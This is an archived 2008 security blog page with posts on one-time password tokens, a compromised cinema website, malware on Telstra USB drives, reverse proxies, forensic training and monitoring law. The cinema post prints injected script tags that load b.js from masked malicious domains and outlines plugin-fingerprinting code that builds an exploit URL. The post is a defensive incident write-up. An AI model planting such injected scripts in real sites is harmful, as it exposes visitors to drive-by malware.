Dailies
- Caoine
- Echoica
- Jina Bolton
- Lifehacker
- Overclockers Australia
- RiskAnalys.is
- Rory.Blog
- Schneier on Security
- Security Catalyst Community
- Security Ripcord
- Securosis.com
- Slashdot
- Whirlpool
Photos
Categories
- Books
- Computers
- Family
- Forensics
- General
- GTD
- Movies
- Music
- Profession
- Security
- University and Studies
- Web Development
Monthly archives
- June 2008
- May 2008
- April 2008
- March 2008
- February 2008
- January 2008
- December 2007
- November 2007
- October 2007
- August 2007
- July 2007
- June 2007
- May 2007
- April 2007
- December 2006
- June 2006
- May 2006
- April 2006
- March 2006
- August 2005
- July 2005
- June 2005
- May 2005
- April 2005
- February 2005
- October 2004
- September 2004
- August 2004
- July 2004
- June 2004
- May 2004
- April 2004
- March 2004
- February 2004
- January 2004
- December 2003
- November 2003
- October 2003
- September 2003
- August 2003
- July 2003
- June 2003
- May 2003
- April 2003
- March 2003
- February 2003
- January 2003
- December 2002
- November 2002
- October 2002
Search
No Excuses
If Blizzard is able to offer One Time Password Tokens for a MMORPG platform, then there is no longer a reason why your financial institute doesn’t offer the same. Be it fat tokens or SMS one-time text.
I’ve had a couple of conversations about what happens when the baseline for user authentication is reset. I believe in the next year or so that milestone will be crossed, where the majority of online systems which provide access to PII or finance data will have either authentication-level, or even transaction-level, second factor authentication/authorisation.
For the baddies, this means that their modus operandi will have to evolve as well, and perhaps we’ll see an increase in sophisticated, real-time phishing sites, or smarter and targeted malware or man-in-the-middle-ware. There’s just too much money and information out there for the stealing, so I can’t see them simply packing up their bags and calling it quits. It’ll be interesting to see what happens next.
Posted by Christian 
Posted in: General 
1 Comment » 
29 June 2008
That’s What I Want
It started with the online purchasing of movie tickets
Since I’ve been running with the NoScript addon within Firefox I’ve found that when pages try to load remote scripts they seem to be much more noticeable. This was particularly the case when over a month ago I was purchasing tickets online through one of our local, Australian cinema chains (Greater Union) and I ended up on the help page. In this instance, I had already temporarily allowed the primary site in NoScript so I could purchase the tickets (the site needed this functionality to work), but when the help page loaded NoScript advised me that there were another 6 domains with scripts that wanted to run. When I clicked the NoScript button at least 4 of those other domains did not appear legitimate, such as bin###.com, adw*.com, app##.com.
At the time I didn’t think much of this event and simply closed the help page and continued purchasing my tickets. I was in a rush of course and had to get to the movies to see Iron Man or something. A few days later I checked the page again and this time noticed that the scripts appeared to be pointing to different domains. When reviewing the HTML source it also became apparent that the javascript calls were not likely to be legitimate, as they seemed to be called inside ad-hoc <option> tags. For example:
<option value='cinebuzz_club#Cinebuzz Club<script src=http://www.hl***.com/b.js></script><script src=http://www.bin###.com/b.js></script><script src=http://www.apps##.com/b.js></script><script src=http://www.app##.com/b.js></script>'>Cinebuzz Club
The SQL Injection Worm
A quick Google search for “b.js” had a number of hits, but the article that provided the most information was the SANS Diary on “SQL Injection: More of the Same“. It appeared as if the first reported instance of this SQL Injection Worm was reported by SANS in May. The original summary of the vulnerability, as seen here, describes the javascript as opening a hidden iframe, which in turn opens up other iframes (dependent on your browser), eventually trying to download or execute a malicious piece of software.
The current incarnation of the site appears to be a little more advanced as the malicious domains hosting the b.js file appear to be fast-flux hosted, as written up here, and the content within the subsequent hidden iframe is obfuscated javascript (yay). But using the technique as described here (in fact the obfuscated javascript looked really similar) using Mozilla’s Rhino, the script eventually exposed the following logic:
- Set default values for 4 variables
- Loop through navigator.plugins looking for: QuickTime, Adobe Acrobat, Shockwave Flash
- For each of the 3 plugins, set a value for against one of the first 3 variables, depending on subsequent logic that looks at version numbers for each plugin
- Try and check that the video/x-ms-wmv is an enabled plugin, and set the 4th variable
- Construct a new target script URL dependant on the above variables, for example: evil##.com/cgi-bin/index.cgi?c82fc0be071f01200077e0ed58020000000002804b628eff00 + var1 + var2 + var3 + var4
I haven’t had much luck in getting the target website to produce anything other than a HTTP 500 response, but I’m assuming that depending on the parameter passed to index.cgi the server then spews out a different exploit or piece of malware.
The Problem
The primary concern I have with this piece of malicious javascript is the fact that Greater Union actively advertises and insists that their customers use the online channel for purchasing tickets. In fact, they’ve made it increasingly difficult to purchase tickets at the cinema itself because you then lose the ability to choose your seats. The only way to guarantee particular seats is to buy your tickets online. So we’re stuck in a situation where we are recommended to purchase tickets online, the only method of course is by submitting credit card information, and other portions of the website are hosting malicious javascript exploited by an underlying SQL Injection vulnerability. How do we know that the ticket-purchasing portion of the website doesn’t have similar vulnerabilities? The short answer is we don’t.
What exacerbates this is the fact that it’s been over a month and the vulnerability has not been fixed. In fact, if the target domains keep on changing, it implies that the site keeps on getting exploited. The “baddies” are updating their code, updating the malicious payloads, and are re-exploiting this site over and over again. This certainly impacts upon my trust in them as a provider to keep my personal information/credit card information protected. If their site is susceptible to a SQL Injection worm, then someone doing targeting hacking against the site is likely to uncover all sorts of information.
What can we do?
Moving this forward and trying to provide some sort of assistance, a couple of things I would recommend if I were in their shoes would be:
- Firstly I would find your vulnerability and patch/fix it. (There’s been a lot of talk about Scrawlr recently, that’s probably a good place to start).
- Secondly I would review the rest of the code base for any similar issues.
- Thirdly, start to put some strategy around embedding security within your development lifecycle (SDL/SDL-IT/Whatever), if it isn’t already in place.
Posted by Christian Posted in: Profession, Security 2 Comments » 28 June 2008
More Than Meets The Eye
Just read this article by Michael Farnum over on computerworld.com and I have to say, what a spectacular example of security through absurdity.
Posted by Christian Posted in: General, Security No Comments » 3 June 2008
Telstra Malware at AusCERT and the Security Equals ‘No’ Dilemma
The past couple of weeks have been an absolute rollercoaster. Last week we had a fairly hectic one with a number of our guys attending AusCERT, and then this week was a combination of busy work and getting ill. I find making the decision to call in sick to be one of the more difficult decisions I have to make. Am I actually sick enough not to go to work? Will I make myself much sicker if I just muscle through it? Will I make other people sick? I’m always of two minds with this issue. This instance was probably a bit easier, as the Tuesday night I was waking up every hour or so with head and body aches and so making the call on the Wednesday was really simple.
One of the interesting items that came out of AusCERT that had us all talking, and scratching our heads wondering why popular press weren’t getting into it, was the news that Telstra accidentally distributed malware on USB thumb drives (and here) they were handing out. I guess popular media has more important things to talk about. I know it certainly makes you question whether or not you’d want to use them for security services. Of course, I understand that chances are this was a sales/marketing mistake and so doesn’t necessarily highlight the professionalism of the Telstra security folk.
Another interesting entry I read this week (or was it last week?.. my memories still a little shattered from the cold/flu) was Kees Leune’s post on Never say ‘no’. Kees talks about the all too common situation where security people are seen as the ‘no’ people (thought police, policy nazis, project killers, whatever). More often than not this is actually a perception problem. If the security person is doing their job right they should not be saying no, they should be identifying and highlighting risk. It’s the owners of the risk who are the people who are saying no, not the people identifying the risk. Usually risk assessors are positioned in such a way that they can’t even own a risk, so for them to be saying no would imply some break in the risk management framework.
I can definitely relate to this problem, and further so believe that once your department has developed that reputation it is a very difficult thing to change it. It’s not just a name change that will fix it, it’s almost an entire culture change that has to occur. I’m not completely sure I understand the answer to the problem, it falls into the bucket of ‘you just have to keep on working hard at it.’
Posted by Christian Posted in: Computers, Profession, Security No Comments » 30 May 2008
The Power of Design to Fight Crime
Just read this article over on core77 summarising an event held by the UK Design Council which collected forty leading technology designers and manufacturers plus a group of young people to discuss “new ways of harnessing the power of design to protect young people from crime - particularly theft of ‘hot products’ like mobile phones and MP3 players.” This event was conceived after the Design Council released some stats that show that the majority of 11-16 year olds in England carry a gadget with them at some point and that one in eight have been the victim of ‘hot product’ theft in the past three years. I believe ‘hot product’ theft is where the product is stolen from them whilst they’re still using it, such as on the mobile (cell) phone, or listening to an iPod.
Core77’s excerpt provides the most concise overview:
The focus is on generating innovative design briefs which offer a clear business opportunity for manufacturers who will be encouraged to develop them into the next generation of crime-safe gadgets. [...] Home Secretary Jacqui Smith said:
“I am delighted that so many of our best designers have contributed their time and expertise to today’s event and I look forward to seeing genuinely new and commercially viable products flow from it. The role that good design can play in cutting crime is well established but success depends on effective partnerships between Government, the police and the design industry.”
At first I didn’t quite understand what they meant by utilising “design” to prevent crime, believing that it was more centered on architecture, such as developing city spaces which demote crime. But after skimming this article it started to make sense. Richard Farson explains this concept by discussing the power of design:
Design achieves its power because it can create situations, and a situation is more determining of what people will actually do than is personality, character, habit, genetics, unconscious motives or any other aspect of our individual makeup. Nobody smokes in church, no matter how addicted.
…
Recently, the design disciplines have received research attention indicating that the physical environments designers create may have positive effects never before realized, potentially reducing all of the measures of despair. For example, studies show that if children grow up in a home designed to permit a view of greenery, they are less likely to turn to addiction and crime and more likely to achieve in school. Such thoughtfully designed environments can reduce the frequency of divorce and other signs of family dysfunction. It is no longer far-fetched to predict that intelligent design will help prevent mental and physical illness, child abuse and suicide.
Richard also explains that this design power also has a ‘dark side’:
Because it is so powerful, design also has a dark underside. If mindlessly conceived or corrupted, design can produce depressing consequences. The design of cities that plan giant shopping centers can erode traditional communities by forcing neighborhood businesses to close. Massive highway construction can divide and rupture a neighborhood. Kafkaesque office designs of row after row of monitored employees, or maze-like cubicles, can dehumanize. Graphic designs in advertising can be dangerously misleading, promoting unhealthy products or unworthy candidates. Some designers think these bad designs greatly outnumber the good ones.
I believe that a lot of these principles can map to web application security principles as well. At a high level it’s easy to relate the concept that mindlessly conceived or corrupted design of a web application will have an impact upon how many vulnerabilities it may have. In addition, the design of a web application, either be through its presentation layer, or more subtly through the way that business logic is represented in HTML (for example) can also create a false pretense that the system is secure. A good example is a traditional design firm promoting the security of their applications because they utilise SSL/TLS to encrypt the site, when employing SSL may be good for protecting data in transit, but doesn’t help prevent vulnerabilities exposed through XSS or CSRF.
On a deeper level, such as taking into account what the Internet provides for crime, I think the principles still align as well. If it wasn’t trivial to perpetrate crime remotely, anonymously and on such a large scale would it be so prevalent? Probably not. The Internet was not initially designed with a security hat on so of course it’s insecure at a low level.
Posted by Christian Posted in: Computers, Security, Web Development No Comments » 18 May 2008
Web Server vs Reverse Proxy
Whilst being a member for over a year, I think this is the first time I’ve mentioned the Security Catalyst Community forum. Whilst not much of a frequent poster, I do find myself going back there almost daily to catch up on discussions that people are having that might be relevant to me either personally or professionally. The forum was started by Michael Santarcangelo over at SecurityCatalyst.com, and over the period that I’ve been following the forum the number of users actively participating certainly has been growing.
The reason I wanted to write about it today was primarily driven by a recent thread on the forum about “Web Server VS Reverse Proxy” (by David Stern) that mirrored conversations that I was also having with colleagues on:
“What exactly are the controls that reverse proxies provide to a 3-tier web application?”
The thread seemed to echo what we were talking about at work, so I was pleased to see the general acknowledgement that the actual control provided by a reverse proxy is more about introducing another layer between the data and the client, and that the consensus seemed to imply that this control is actually quite weak. Especially as most run of the mill reverse proxies would not help mitigate web application type risks, such as information disclosure or SQL injection.
Another comment (thank you Kees Leune) highlighted that traditionally, reverse proxies were designed to provide non-security functions, such as load-balancing, SSL offloading or aggregating your web presence through a single point (potentially to simplify your logging?). Of course, the point that really jumped out at me was from Michael Dickey who mentioned the down-side to reverse proxies, due to the method in which “they may not interpret it the same way a web server will. This can give rise to fun request smuggling attacks or other cache poisoning issues.”
I would highly recommend anyone involved with information security sign up to the forum as I think it’s an invaluable resource. Even if a topic only comes up occasionally that has relevance to you it’s definitely worthwhile.
Posted by Christian Posted in: General No Comments » 10 May 2008
Forensic Acquisition Training
I was fortunate enough to attend a two-day crash course on forensic image acquisition last week. The trainer was Phillip Russo from CIA Solutions, whilst a local Perth boy he spends a huge amount of his time running training elsewhere around the world. The course covered the basics of forensic acquisition, traditional investigation skills and computer crime, integrity tools (hashing), checklists, chain of custody, to shutdown or not shutdown, dead versus live forensics, media types, write blockers (software versus hardware), imaging and image types, and a summary of tools.
One of the highlights for me personally was having an opportunity to discuss more of the court room and legal aspects of presenting evidence, as Phillip had a history of presenting in court in a number of different contexts. I think it was through his experience that he had methods of dissecting fairly difficult concepts, so much so that I imagine even the mums and dads out there could understand. A good example is the concept of file slack. Whilst I may have a fairly good understanding of what file slack is, trying to explain this to people who don’t have any history or experience with computer forensics, even savvy IT people, can be a fairly daunting task. Combine this with trying to explain how hard drives, partitions and file systems work and you certainly have a fairly large task in front of you.
Another highlight was the opportunity, not only to get hands on with hardware write blockers and AccessData’s FTK Imager, but also to combine this with real life scenarios and the process of documentation. Due to studying computer forensics at University I was fairly comfortable with the technical process of data acquisition, but combining this with the realistic process of documenting the acquisition, including chain of custody forms, was quite interesting and surprisingly difficult to do effectively.
The question was raised, whether or not if all the forms were transitioned into digital form, whether that would still be admissible in court. Whilst the concept could not be completely discounted, the fact that such records are not ‘tangible’ seemed to be quite an important factor for court room presentation. Judges and juries seem to have a better grasp of concepts when they can see the evidence in front of them. This certainly made sense to me, and obviously relates quite closely with the KISS principle. I think this also makes sense for this type of environment, probably more so than applying it to web application development for example, as you are already bombarding people with foreign and complex concepts, let alone trying to explain to them the principles of digital signatures of your ‘running sheet’, as opposed to your hand written notes.
Overall a worthwhile 2 days, and whilst it whetted my appetite for further training in forensic analysis, I’ll just have to leave that for another day.
Posted by Christian Posted in: Computers, Forensics, Profession, Security No Comments » 6 May 2008
Sub Rosa
Whilst I certainly don’t claim to be much of a literary critic or expert, I found the semantics behind the word of the day for yesterday to be really interesting, especially due to it’s ties with security.
sub rosa \suhb-ROH-zuh\, adverb:
1. Secretly; privately; confidentially.adjective:
1. Designed to be secret or confidential; secretive; private.
Further investigation (Wiki) highlighted the history behind the latin term, which means ‘under the rose’ and how it’s current understanding in english has come to mean secrecy or confidentiality:
…
The rose was the emblem of the god Horus in ancient Egypt. Later the Greeks and Romans regarded this as god of silence. This originates from a Greek/Roman misinterpretation of an Egyptian hieroglyphic adopting Horus along with Isis and Osiris as a god. The Greeks translated his Egyptian name Har-pa-khered to Harpocrates.
The rose’s connotation for secrecy also dates back to Greek mythology. Aphrodite gave a rose to her son Eros, the god of love; he, in turn, gave it to Harpocrates, the god of silence, to ensure that his mother’s indiscretions (or those of the gods in general, in other accounts) were kept under wraps. Paintings of roses on the ceilings of Roman banquet rooms were also a reminder that things said under the influence of wine (sub vino) should also remain sub rosa. In the Middle Ages a rose suspended from the ceiling of a council chamber similarly pledged all present (those under the rose) to secrecy.
In Christian symbology the phrase “sub rosa” has a special place in confessions. Pictures of file-leaved roses were often carved on confessionals, indicating that the conversations will maintain secrecy. The phrase has also understood to make reference to the mysterious virginal conception of Christ, which will remain a secret to a rational mind.
In current times, the term is actually used by the Scottish Government for a specific type of “off the record” meetings.
In a number of European countries a “sub rosa” remark is deemed to imply sexual innuendo, or at the very least a blow below the belt. More recently, “sub rosa” activities have become a byword for covert operations, usually by security services. Originating primarily in the USA, this meaning has been gradually spreading to other countries and in particular the United Kingdom.
Posted by Christian Posted in: General, Security No Comments » 4 May 2008
Mitigating DoS with Employee Monitoring. What.
This article over on Computerworld Australia seems to have a couple of conflicting items that have been bugging me since I read it the other day. The article begins by mentioning potential changes to federal government legislation:
The changes will give employers power to intercept all Internet-based communications without consent, including e-mails and instant message (IM) discussions.
It’s at this point that all of sudden we go on a massive tangent, whereby the Attorney-General is saying that these legislative changes are a counter-terrorism measure, and that these changes could prevent breaches occurring:
…similar to the Estonian Denial of Service (DoS) attacks in which a 19 year-old hacker disabled the Web sites of banks, schools and the Prime Minister’s office.
Hopefully someone out there can explain to me exactly how allowing employers monitoring rights to their employees is a control against denial of service attacks? Or even better, how exactly a denial of service attack equates to a breach? Especially after they’ve done such a good job of defining what an Information Security Breach is in the “Draft Voluntary Information Security Breach Notification Guide“.
An information security breach occurs when personal information is exposed to unauthorised access, use, disclosure or modification as a result of a breach of an agency’s or organisation’s information security.
The only saving grace in the article was the comment from Nick Elsmore from SIFT where he states that these new laws will have minimal impact on businesses due to most enterprises having provisions for Internet monitoring within employee contracts. My experience in a few different enterprises has proven this to be the case.
Posted by Christian Posted in: General 2 Comments » 25 April 2008
Don’s Windows Incident Response Script
Just had a quick play with Don’s Windows Incident Response Script and am very happy that someone else has put in the time and effort for something as useful as this, and then provided it for all. Some of the useful information it captures includes:
- User Account Information - Account name, Full name, SID, LocalAccount
- System Information - Hostname, manufacturer, OS Type, version, SP etc
- PreFetch File Information (this is AWESOME) - the metadata of about the last 128 programs that were executed
- Installed Software
- Windows Setup Log
- USBSTOR Registry Key
- Windows Firewall Exception List
- Log On and Off Events (if auditing is turned on of course)
- Event Logs
- Temp Internet Information
- Running Processes
- Active Network Connections (ahh netstat)
- Anti-malware logs (dependant on your AV vendor)
So yeah, go check it out.
Posted by Christian Posted in: Computers, Forensics, Security No Comments » 19 April 2008